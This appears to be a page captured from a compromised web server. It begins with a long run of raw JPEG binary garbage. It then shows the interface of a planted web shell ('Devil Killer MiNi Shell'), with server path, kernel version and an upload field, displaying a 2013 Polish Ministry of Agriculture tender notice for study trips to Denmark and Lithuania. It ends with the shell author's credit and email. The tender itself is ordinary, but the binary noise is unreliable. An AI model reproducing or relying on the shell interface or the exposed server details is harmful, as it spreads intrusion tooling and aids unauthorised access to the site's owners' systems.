JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130723/149435-N-2013.html

<p class="kh_header"><b>Warszawa: Organizacja wyjazdów studyjnych dla Ministerstwa Rolnictwa i Rozwoju Wsi z możliwością składania ofert częściowych</b><br>
<b>Numer ogłoszenia: 149435 - 2013; data zamieszczenia: 23.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Rolnictwa i Rozwoju Wsi , ul. Wspólna 30, 00-930 Warszawa, woj. mazowieckie, tel. 22 6232649, faks 22 6232315.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.minrol.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja wyjazdów studyjnych dla Ministerstwa Rolnictwa i Rozwoju Wsi z możliwością składania ofert częściowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja wyjazdów studyjnych dla Ministerstwa Rolnictwa i Rozwoju Wsi z możliwością składania ofert częściowych:
Część 1- Organizacja wyjazdu studyjnego do Danii dla grupy 26 osób - przedstawicieli organizacji rolniczych, związków zawodowych, samorządu rolniczego i producentów rolnych oraz 4 osób związanych z wdrażaniem tego programu, w tym pracowników MRiRW; Cześć 2 - Organizacja wyjazdu studyjnego Polska-Litwa dla grupy 40 beneficjentów PROW 2007-2013 oraz 6 osób związanych z wdrażaniem tego programu, w tym pracowników MRiRW.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3, 60.00.00.00-9, 63.51.00.00-7, 66.51.00.00-8, 79.54.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert Zamawiający żąda od Wykonawców wniesienia wadium na cały okres związania ofertą w wysokości:
część  I  zamówienia - 2 000,00 zł (słownie: dwa tysiące złotych);
część II zamówienia - 2 000,00 zł (słownie: dwa tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wpis w rejestrze organizatorów turystyki i pośredników turystycznych, o którym mowa w ustawie z dnia 29 sierpnia 1997 r. o usługach turystycznych (Dz. U z 2004 r. Nr 223, poz. 2268, ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1 zamówienia - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca  wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie zrealizował co najmniej trzy usługi, z których każda polegała na zorganizowaniu zagranicznego wyjazdu szkoleniowo-studyjnego w zakresie tematyki rolniczej dla grupy minimum 20 osób;Część 2 zamówienia - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca  wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie zrealizował co najmniej dwie usługi, z których każda polegała na zorganizowaniu zagranicznego wyjazdu szkoleniowo-studyjnego w zakresie tematyki rolniczej dla grupy minimum 30 osób.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1 zamówienia - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
a) tłumaczem posługującym się językiem duńskim na poziomie zaawansowanym w   zakresie słownictwa z branży rolniczej;
b) pilotem posługującym się językiem duńskim na poziomie zaawansowanym. Część 2 zamówienia - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
a) tłumaczem posługującym się językiem litewskim na poziomie zaawansowanym w   zakresie słownictwa z branży rolniczej;
b) pilotem posługującym się językiem litewskim na poziomie zaawansowanym.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wpis do rejestru organizatorów turystyki i pośredników turystycznych, o którym mowa w ustawie z dnia 29 sierpnia 1997 r. o usługach turystycznych (Dz. U z 2004 r. Nr 223, poz. 2268, ze zm.)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Dodatkowe doświadczenie Wykładowcy - 40</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.minrol.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Rolnictwa i Rozwoju Wsi
Wydział Zamówień Publicznych
ul. Wspólna 30, pok. 122, 00-930 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2013 godzina 10:30, miejsce: Ministerstwo Rolnictwa i Rozwoju Wsi
Wydział Zamówień Publicznych
ul. Wspólna 30, pok. 122, 00-930 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część I zamówienia - Projekt finansowany na podstawie Porozumienia w sprawie przekazania środków pochodzących z Funduszy Counterprt Founds CPF Sektorowych Agrolinia w dniu 15.03.2011 r. pomiędzy Ministerstwem Spraw Zagranicznych a Ministerstwem Rolnictwa i Rozwoju Wsi.
Część II zamówienia - Projekt współfinansowany ze środków Unii Europejskiej w ramach pomocy technicznej Programu Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja wyjazdu studyjnego do Danii dla grupy 26 osób - przedstawicieli organizacji rolniczych, związków zawodowych, samorządu rolniczego i producentów rolnych oraz 4 osób związanych z wdrażaniem tego programu, w tym pracowników MRiRW w terminie od dnia  2  września 2013 r. do dnia  5 września 2013 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja wyjazdu studyjnego do Danii dla grupy 26 osób - przedstawicieli organizacji rolniczych, związków zawodowych, samorządu rolniczego i producentów rolnych oraz 4 osób związanych z wdrażaniem tego programu, w tym pracowników MRiRW w terminie od dnia  2  września 2013 r. do dnia  5 września 2013 r.
W terminie 3 dni od dnia zawarcia umowy, Wykonawca przekaże Zamawiającemu projekt programu wyjazdu studyjnego.
W ramach zamówienia Wykonawca zapewni:
1)	zakwaterowanie dla 30 uczestników, w każdym dniu wyjazdu, w hotelach ze śniadaniem, w pokojach o standardzie min. 3*, w tym:  w 4 pokojach jednoosobowych i 13 pokojach dwuosobowych;  
2)	transport:
a)	lotniczy na trasie Warszawa - Kopenhaga w dniu 2 września 2013 r. oraz  Kopenhaga - Warszawa w dniu 5 września 2013 r.
b)	autokarowy na terenie Danii. Autokar powinien być wyposażony w klimatyzację, toaletę, minibarek, DVD, nagłośnienie, fotele lotnicze; 
3)	wyżywienie dla 30 osób, tj. obiady i kolacje w dniach od 2 do 4 września 2013 r.  oraz obiad w dniu 5 września 2013 r.; 
4)	ubezpieczenie uczestników wyjazdów KL+NW oraz ich bagażu (standardowe ubezpieczenie turystyczne - jednorazowy wyjazd poza granice Polski);
5)	opiekę pilota oraz tłumacza podczas całego wyjazdu, posługujących się językiem duńskim  na poziomie zaawansowanym. Tłumacz powinien posługiwać się jęz. duńskim na poziomie zaawansowanym w tematyce rolnictwa; 
6)	organizację spotkania uczestników wyjazdu z przedstawicielami Duńskiej Rady ds. Rolnictwa i Żywności, w trakcie którego uczestnicy zostaną poinformowani o roli jaką pełni Duńska Rada ds. Rolnictwa. Spotkanie powinno zostać zorganizowane w miejscu umożliwiającym przeprowadzenie dyskusji na temat rolnictwa duńskiego i polskiego oraz przyszłości WPR; 
7)	zorganizowanie serwisu kawowego w trakcie spotkania z przedstawicielami Duńskiej Rady ds. Rolnictwa i Żywności;
8)	organizacje wizyt: 
a)	w gospodarstwie zajmującym się hodowlą  bydła mlecznego oraz w zakładzie mleczarskim, korzystających ze środków finansowych z UE na rozwój;
b)	w gospodarstwie zajmującym się hodowlą trzody chlewnej oraz w zakładach przetwórstwa mięsnego, korzystających z dotacji unijnych na rozwój;
9)	zwiedzanie Kopenhagi z przewodnikiem oraz w czasie pobytu w Danii, zwiedzanie ciekawych przyrodniczo i kulturowo miejsc.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3, 60.00.00.00-9, 63.51.00.00-7, 66.51.00.00-8, 79.54.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja wyjazdu studyjnego Polska-Litwa dla grupy 40 beneficjentów PROW 2007-2013 oraz 6 osób związanych z wdrażaniem tego programu, w tym pracowników MRiRW w terminie od dnia 22 września 2013 r. do dnia 28 września 2013 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie wyjazdu studyjnego Polska - Litwa, dla grupy 40 beneficjentów PROW na lata 2007-2013 oraz 6 pracowników Zamawiającego związanych z wdrażaniem tego programu, w tym pracowników MRiRW w terminie od dnia 22 września 2013 r. do dnia 28 września 2013 r. 
W terminie 3 dni od dnia zawarcia umowy, Wykonawca przekaże Zamawiającemu do akceptacji szczegółowy projekt programu.
W ramach zamówienia Wykonawca zapewni:
1)	zakwaterowanie w każdym dniu wyjazdu na terenie Polski i Republiki Litewskiej, w hotelach ze śniadaniem, w pokojach o standardzie min. 3*, w tym: w  6 pokojach jednoosobowych i 20 pokojach dwuosobowych,  dla 46 uczestników wyjazdu, przy czym koszt noclegu za osobę, za noc nie przekroczy 280,80 zł brutto na terenie Polski oraz 130 euro brutto na terenie Litwy;
2)	transport autokarowy z i do Warszawy i w trakcie wyjazdu, tj. od 22 do 28 września 2013 r., zgodnie z programem wyjazdu opracowanym przez Zleceniobiorcę i zaakceptowanym przez Zleceniodawcę. Autokar powinien być wyposażony w klimatyzację, toaletę, minibarek, DVD, nagłośnienie, fotele lotnicze. Autokar powinien być obsługiwany przez 2 kierowców. Wyjazd z Warszawy nastąpi w dniu 22 września 2013 r., a powrót do Warszawy w dniu 28 września 2013 r.; 
3)	wyżywienie dla 46 osób, tj. obiady i kolacje w dniach od 22 do 28 września 2013 r.  oraz obiad w dniu 28 września 2013 r.; 
4)	ubezpieczenie uczestników wyjazdów KL+NW oraz ich bagażu (standardowe ubezpieczenie turystyczne - jednorazowy wyjazd poza granice Polski);
5)	pilota oraz tłumacza, posługujących się językiem litewskim na poziomie zaawansowanym. Tłumacz powinien posługiwać się jęz. litewskim na poziomie zaawansowanym w tematyce rolnictwa;
6)	w dniu 22 września 2013 r. zakwaterowanie w hotelu w Augustowie lub okolicach (do 40 km);
7)	w dniu 22 września 2013 r. zapoznanie uczestników z obszarami Natura 2000 w okolicach Augustowa. Zorganizowanie rejsu statkiem po Kanale Augustowskim, w trakcie którego zaprezentowane będą zagadnienia dot. Programu rolnośrodowiskowego, w tym pakietu: Ochrona zagrożonych gatunków ptaków i siedlisk przyrodniczych na obszarach Natura 2000.   
8)	salę konferencyjną na szkolenie z zakresu PROW 2007-2013  w dniu 22 września 2013 r. w hotelu w Augustowie lub okolicach - do 2 godzin (łącznie z przerwą kawową), dla co najmniej 50 osób, wyposażoną w laptopa i rzutnik  multimedialny oraz nagłośnienie;
9)	zorganizowanie serwisu kawowego (1 podanie) w trakcie szkolenia w dniu 22 września 2013 r. w hotelu w Augustowie lub okolicach oraz serwisów kawowych w trakcie spotkań zorganizowanych na terenie Republiki Litewskiej, zgodnie z programem zaproponowanym przez Zleceniobiorcę i zaakceptowanym przez Zleceniodawcę;
10)	w dniu 23 września 2013 r. zorganizowanie wizyty w gospodarstwie rolnym, specjalizującym się w produkcji mleka i wykorzystującym na swój rozwój środki finansowe z PROW 2007-2013 oraz wizyty w Spółdzielni Mleczarskiej, np.:  Mlekpol w Grajewie, w Okręgowej Spółdzielni Mleczarskiej w Piątnicy, SM Sudowia w Suwałkach lub Monieckiej Spółdzielni Mleczarskiej w Mońkach;
11)	w dniu 24 września 2013 r. zorganizowanie na terenie województwa warmińsko-mazurskiego lub podlaskiego wizyty w gospodarstwie agroturystycznym, powstałym przy współudziale środków finansowych z PROW 2007-2013 oraz wizyty w grupie producentów rolnych, wykorzystującej środki z UE;
12)	w dniach od 25 do 28 września 2013 r., zorganizowanie  na terenie Republiki Litewskiej:
a)	spotkania z przedstawicielami Izby Rolniczej Litwy w Wilnie, podczas którego prowadzona będzie dyskusja na tematy dotyczące rolnictwa, wykorzystania środków finansowych z PROW  oraz przyszłości WPR, 
b)	wizyty w grupie producentów rolnych, prowadzących działalność przy wykorzystaniu środków pochodzących z UE,
c)	spotkania z litewskimi  producentami mleka oraz wizyty w zakładzie przetwórstwa mleka;
d)	wizyty związanej z realizacją litewskiego PROW w zakresie wykorzystania środków na rozwój innej działalności niż rolnicza - np. wizyta w gospodarstwie agroturystycznym, zapoznanie uczestników z działalnością rzemieślniczą;
e)	wizyt w miejscach  związanych z historią, tradycją i folklorem litewskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3, 60.00.00.00-9, 63.51.00.00-7, 66.51.00.00-8, 79.54.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com